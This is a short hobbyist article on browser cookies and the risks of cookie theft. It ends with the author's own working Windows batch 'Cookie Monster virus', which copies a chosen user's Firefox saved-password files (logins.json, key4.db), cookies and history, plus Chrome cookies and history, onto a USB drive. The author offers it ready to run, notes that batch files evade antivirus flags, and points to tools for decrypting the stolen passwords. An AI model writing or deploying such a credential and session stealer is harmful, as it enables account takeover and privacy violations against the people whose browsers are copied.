Cookie Monster

by Street

A "Cookie Monster" virus specifically targets Internet cookies, which are small pieces of data stored on a user's computer by websites for various purposes such as tracking, authentication, and personalization.  The 1995 movie Hackers featured a "Cookie Monster" virus.

Cookies serve several important functions:

Authentication:  When you login to a website, a cookies is created with your login credentials.

Session Management:  Cookies store session IDs, allowing you to remain logged into a website even after you leave.

Personalization:  Websites use cookies to remember your preferences and settings.

Tracking and Analytics:  Cookies can track which pages you have visited.

Targeted Advertising:  Cookies are used to track your browsing history and deliver targeted ads.

Cookies raise privacy concerns, and you can block or delete cookies if you are not comfortable using them.

Cookies can also be stolen.

If someone were to steal cookies from your computer or device, it could pose several potential dangers, particularly in terms of privacy and security:

Unauthorized Access:  Cookies often contain authentication tokens or session IDs.  If these cookies are stolen, an attacker could potentially use them to gain access to your accounts without needing your username and password.

Privacy Concerns:  Cookies may store information about your browsing history, preferences, and interactions with websites.  Stolen cookies can be used to monitor your online activities.

Data Breaches:  If cookies are stolen from a website or service, it could cause a large security breach.  This could lead to the exposure of sensitive user data, including personal information, financial details, and other confidential data.

Stolen cookies represent a security and privacy risk.  They can lead to unauthorized access, privacy violations, and identity theft.

Unfortunately, cookies aren't very secure, or even encrypted.  You can copy a cookie file from one computer and it will work on another machine.  You can even read cookie files just as easily as looking at your browser's history.

There are a few tools you may be interested in that are made by NirSoft.  They can open and edit Firefox and Google Chrome cookie files.

MZCookiesView v1.60

ChromeCookiesView v1.76

Below is my own "Cookie Monster" virus that I wrote as a Windows batch file.

You could write the same program in any language, but a .BAT file isn't going to be flagged as a virus.  Also, if you are reading this and don't know how to compile code, you can simply copy this file into Notepad and save it with a .BAT extension and it will run.

This .BAT file needs to be on a USB drive (D:).  When you run the .BAT file it copies the cookies from Mozilla Firefox and Chrome to the root of the USB drive.  It will also copy other important files, like browser history and Mozilla Firefox passwords.

The browser history and password files are in the same directory as the cookies.

Firefox passwords are in the logins.json file ($HOME/.mozilla/$profile$/logins.json), and need to be in the same directory as key4.db (encryption keys) to be decrypted.

A tool like WebBrowserPassView will do the job.

Unfortunately, I haven't found a good way to crack Chrome password encryption without being on the local machine.  NirSoft also makes tools for the browser history files:

MZHistoryView

ChromeHistoryView

cookie-monster-virus.bat:

REM Cookie Monster Virus @echo off setlocal enabledelayedexpansion set "directory=C:\Users" set /a count=0 echo. echo Select User echo ----------- echo. for /d %%i in ("%directory%\*") do ( set /a count+=1 echo !count! %%!nxi ) echo. set /p selection="> " set /a count = 0 set "user=" for /d %%i in ("%directory%\*") do ( set /a count+=1 if "!count!" == "%selection%" ( set "user=%%~nxi" goto end_loop ) ) :end_loop echo. echo Selected: %user% set "targetFile=logins.json" set "searchDir=C:\Users\%user%\AppData\Roaming\Mozilla\Firefox\Profiles\" for /r "%searchDir%" %%i in (%targetFile%) do ( copy "%%i" "D:\" > nul ) set "targetFile=key4.db" set "searchDir=C:\Users\%user%\AppData\Roaming\Mozilla\Firefox\Profiles\" for /r "%searchDir%" %%i in (%targetFile%) do ( copy "%%i" "D:\" > nul ) set "targetFile=cookies.sqlite" set "searchDir=C:\Users\%user%\AppData\Roaming\Mozilla\Firefox\Profiles\" for /r "%searchDir%" %%i in (%targetFile%) do ( copy "%%i" "D:\" > nul ) set "targetFile=places.sqlite" set "searchDir=C:\Users\%user%\AppData\Roaming\Mozilla\Firefox\Profiles\" for /r "%searchDir%" %%i in (%targetFile%) do ( copy "%%i" "D:\" > nul ) set "targetFile=Cookies" set "searchDir=C:\Users\%user%\AppData\Local\Google\Chrome\" for /r "%searchDir%" %%i in (%targetFile%) do ( copy "%%i" "D:\" > nul ) set "targetFile=History" set "searchDir=C:\Users\%user%\AppData\Local\Google\Chrome\" for /r "%searchDir%" %%i in (%targetFile%) do ( copy "%%i" "D:\" > nul ) echo Done. echo. timeout /t 2 /nobreak > nul endlocal

Code: cookie-monster-virus.bat